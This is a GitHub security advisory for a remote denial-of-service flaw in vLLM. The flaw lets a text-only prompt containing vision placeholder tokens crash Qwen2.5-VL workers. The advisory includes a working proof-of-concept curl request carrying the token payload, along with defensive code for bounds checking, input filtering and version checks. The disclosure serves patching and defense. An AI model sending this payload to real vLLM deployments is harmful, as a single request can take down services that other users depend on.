GHSA-HPV8-X276-M59F
Vulnerability from github – Published: 2026-05-05 22:21 – Updated: 2026-05-13 16:27
Summary
vLLM Vulnerable to Remote DoS via Special-Token Placeholders
Details
Summary
This report describes a token injection vulnerability in vLLM’s multimodal processing. When an unauthenticated, text-only prompt spells out special tokens, vLLM interprets them as control tokens rather than as literal text. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError that terminates the worker or degrades availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.
Details
- Affected component: multimodal input position computation.
- File/functions (paths are indicative):
  - vllm/model_executor/layers/rotary_embedding.py
  - get_input_positions_tensor(...)
  - _vl_get_input_positions_tensor(...)
- Failure mechanism:
  - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
  - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.
Representative snippet (context):
# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )
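The failure mode can be illustrated in isolation with a minimal sketch. This is not vLLM code and not the upstream fix: `grid_entry` is a hypothetical helper, and plain Python lists stand in for the real grid tensors. It only shows the difference between indexing an empty grid directly and checking bounds first, so that a placeholder with no backing data becomes a request-level error instead of an unhandled IndexError.

```python
from typing import Sequence, Tuple


def grid_entry(
    grid_thw: Sequence[Sequence[int]], index: int, kind: str
) -> Tuple[int, int, int]:
    """Return (t, h, w) for placeholder number `index` (hypothetical helper).

    Raises ValueError when the prompt references more placeholders than
    there are grid entries, instead of letting an IndexError escape.
    """
    if not 0 <= index < len(grid_thw):
        raise ValueError(
            f"prompt references {kind} placeholder #{index}, "
            f"but only {len(grid_thw)} {kind} grid entries were supplied"
        )
    t, h, w = grid_thw[index]
    return t, h, w


if __name__ == "__main__":
    empty_video_grid = []  # text-only request: no video payload was attached

    # Unchecked indexing, as in the representative snippet above.
    try:
        empty_video_grid[0]
    except IndexError as exc:
        print("unchecked indexing failed:", exc)

    # Bounds-checked lookup: the caller can map this to a 4xx response.
    try:
        grid_entry(empty_video_grid, 0, "video")
    except ValueError as exc:
        print("rejected request:", exc)
```

Raising a ValueError here is a design choice of the sketch: a caller that catches it can reject the single offending request, whereas an uncaught IndexError deep in position computation takes the worker down with it.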
Abbreviated call path:
OpenAI API request
→ vllm.v1.engine.core: step/execute_model
→ vllm.v1.worker.gpu_model_runner: _update_states/execute_model
→ vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
→ _vl_get_input_positions_tensor
→ IndexError: list index out of range
PoC
Environment
- vLLM: 0.10.0
- Model: Qwen/Qwen2.5-VL-3B-Instruct
- Launch server:
python -m vllm.entrypoints.openai.api_server \
--model Qwen/Qwen2.5-VL-3B-Instruct \
--port 8000
Request (text-only, no image/video data)
cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        { "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json
Observed result
- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
- In some deployments, the worker exits and capacity remains reduced until manual restart.
Impact
- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
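For deployments that cannot upgrade immediately, one possible stopgap is to screen user text for placeholder tokens in front of the server. The sketch below is an illustration under stated assumptions, not part of vLLM and not the upstream fix: `find_placeholder_tokens` is a hypothetical helper, the token list combines the three tokens from the PoC with `<|video_pad|>` (assumed here to be the matching video placeholder for Qwen2.5-VL), and other model families use different special tokens.

```python
from typing import Any, Dict, List

# Tokens from the PoC, plus an assumed video counterpart.
PLACEHOLDER_TOKENS = (
    "<|vision_start|>",
    "<|vision_end|>",
    "<|image_pad|>",
    "<|video_pad|>",  # assumption: not shown in the advisory's PoC
)


def find_placeholder_tokens(messages: List[Dict[str, Any]]) -> List[str]:
    """Return the placeholder tokens spelled out in user-supplied text parts."""
    seen = set()
    for message in messages:
        content = message.get("content")
        # Chat content is either a plain string or a list of typed parts.
        if isinstance(content, str):
            parts = [{"type": "text", "text": content}]
        else:
            parts = content or []
        for part in parts:
            if part.get("type") != "text":
                continue
            text = part.get("text", "")
            seen.update(tok for tok in PLACEHOLDER_TOKENS if tok in text)
    # Report in a stable order so results are easy to log and compare.
    return [tok for tok in PLACEHOLDER_TOKENS if tok in seen]


if __name__ == "__main__":
    poc_messages = [
        {
            "role": "user",
            "content": [
                {
                    "type": "text",
                    "text": "what's in picture "
                    "<|vision_start|><|image_pad|><|vision_end|>",
                }
            ],
        }
    ]
    offending = find_placeholder_tokens(poc_messages)
    if offending:
        print("reject with HTTP 400; text contains:", offending)
```

A gateway or proxy could call this on each chat request body and refuse any request for which the returned list is non-empty. Matching literal strings is deliberately conservative: it also blocks harmless prompts that merely quote these tokens.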
Fixes
- Changes associated with https://github.com/vllm-project/vllm/issues/32656
Credits
Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)
Severity
6.5 (Medium)
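The 6.5 figure follows from the CVSS vector recorded for this advisory, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H. As a worked check, the sketch below applies the CVSS v3.1 base-score equations for the scope-unchanged case. The function names are illustrative, and the metric weights are the ones published in the CVSS v3.1 specification.

```python
import math

# Metric weights from the CVSS v3.1 specification (scope unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged(vector: str) -> float:
    """Compute the base score for a CVSS:3.1 vector with S:U."""
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    iss = 1 - (
        (1 - WEIGHTS["CIA"][metrics["C"]])
        * (1 - WEIGHTS["CIA"][metrics["I"]])
        * (1 - WEIGHTS["CIA"][metrics["A"]])
    )
    impact = 6.42 * iss
    exploitability = (
        8.22
        * WEIGHTS["AV"][metrics["AV"]]
        * WEIGHTS["AC"][metrics["AC"]]
        * WEIGHTS["PR"][metrics["PR"]]
        * WEIGHTS["UI"][metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


if __name__ == "__main__":
    advisory_vector = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
    print(base_score_scope_unchanged(advisory_vector))  # 6.5
```

With this vector the impact term is 6.42 × 0.56 ≈ 3.60 and the exploitability term is about 2.84, which sum to about 6.43 and round up to 6.5. As a matter of arithmetic only, the same vector with PR:N instead of PR:L scores 7.5, which falls in the High band.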
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "vllm"
},
"ranges": [
{
"events": [
{
"introduced": "0.6.1"
},
{
"fixed": "0.20.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44222"
],
"database_specific": {
"cwe_ids": [
"CWE-129"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T22:21:41Z",
"nvd_published_at": "2026-05-12T20:16:43Z",
"severity": "MODERATE"
},
"details": "## Summary\nThis report explains a Token Injection vulnerability in vLLM\u2019s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.\n\n## Details\n- Affected component: multimodal input position computation.\n- File/functions (paths are indicative):\n - vllm/model_executor/layers/rotary_embedding.py\n - get_input_positions_tensor(...)\n - _vl_get_input_positions_tensor(...)\n- Failure mechanism:\n - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.\n - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. 
The code does not bounds-check before indexing.\n\nRepresentative snippet (context):\n```python\n# vllm/model_executor/layers/rotary_embedding.py\n@classmethod\ndef _vl_get_input_positions_tensor(\n cls,\n input_tokens,\n hf_config,\n image_grid_thw,\n video_grid_thw,\n ...,\n):\n # detect video tokens\n video_nums = (vision_tokens == video_token_id).sum()\n # later in processing\n t, h, w = (\n video_grid_thw[video_index][0], # IndexError if no video data\n video_grid_thw[video_index][1],\n video_grid_thw[video_index][2],\n )\n```\n\nAbbreviated call path:\n```\nOpenAI API request\n \u2192 vllm.v1.engine.core: step/execute_model\n \u2192 vllm.v1.worker.gpu_model_runner: _update_states/execute_model\n \u2192 vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor\n \u2192 _vl_get_input_positions_tensor\n \u2192 IndexError: list index out of range\n```\n\n## PoC\n### Environment\n- vLLM: 0.10.0\n- Model: Qwen/Qwen2.5-VL-3B-Instruct\n- Launch server:\n```bash\npython -m vllm.entrypoints.openai.api_server \\\n --model Qwen/Qwen2.5-VL-3B-Instruct \\\n --port 8000\n```\n\n### Request (text-only, no image/video data)\n```bash\ncat \u003e request.json \u003c\u003c\u0027JSON\u0027\n{\n \"model\": \"Qwen/Qwen2.5-VL-3B-Instruct\",\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": [\n { \"type\": \"text\",\n \"text\": \"what\u0027s in picture \u003c|vision_start|\u003e\u003c|image_pad|\u003e\u003c|vision_end|\u003e\" }\n ]\n }\n ]\n}\nJSON\n\ncurl -s http://127.0.0.1:8000/v1/chat/completions \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data @request.json\n```\n\n### Observed result\n- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).\n- In some deployments, the worker exits and capacity remains reduced until manual restart.\n\n## Impact\n- Type: Token Injection leading to Remote Denial of Service (unauthenticated). 
A single request can trigger the fault.\n- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).\n- Effect: Request \u2192 unhandled exception in position computation \u2192 worker termination / service unavailability.\n\n## Fixes\n\n* Changes associated with https://github.com/vllm-project/vllm/issues/32656\n\n## Credits\nPengyu Ding (Infra Security, Ant Group) \nZiteng Xu (Infra Security, Ant Group)",
"id": "GHSA-hpv8-x276-m59f",
"modified": "2026-05-13T16:27:48Z",
"published": "2026-05-05T22:21:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44222"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/issues/32656"
},
{
"type": "PACKAGE",
"url": "https://github.com/vllm-project/vllm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "vLLM Vulnerable to Remote DoS via Special-Token Placeholders"
}
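The affected range in the record above (introduced in 0.6.1, fixed in 0.20.0) can be checked against an installed version with a short sketch like the following. It assumes plain numeric release strings such as 0.10.0; pre-release or local version suffixes are not handled, and `is_affected` is an illustrative name rather than an existing tool.

```python
from typing import Tuple


def parse_release(version: str) -> Tuple[int, ...]:
    """Turn '0.10.0' into (0, 10, 0) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


# Range taken from the advisory's "affected" events.
INTRODUCED = parse_release("0.6.1")
FIXED = parse_release("0.20.0")


def is_affected(version: str) -> bool:
    """True when introduced <= version < fixed."""
    return INTRODUCED <= parse_release(version) < FIXED


if __name__ == "__main__":
    for candidate in ("0.6.0", "0.6.1", "0.10.0", "0.20.0"):
        print(candidate, is_affected(candidate))
```

Comparing integer tuples rather than raw strings matters here: as strings, "0.10.0" sorts before "0.6.1", which would wrongly place the version used in the PoC outside the affected range.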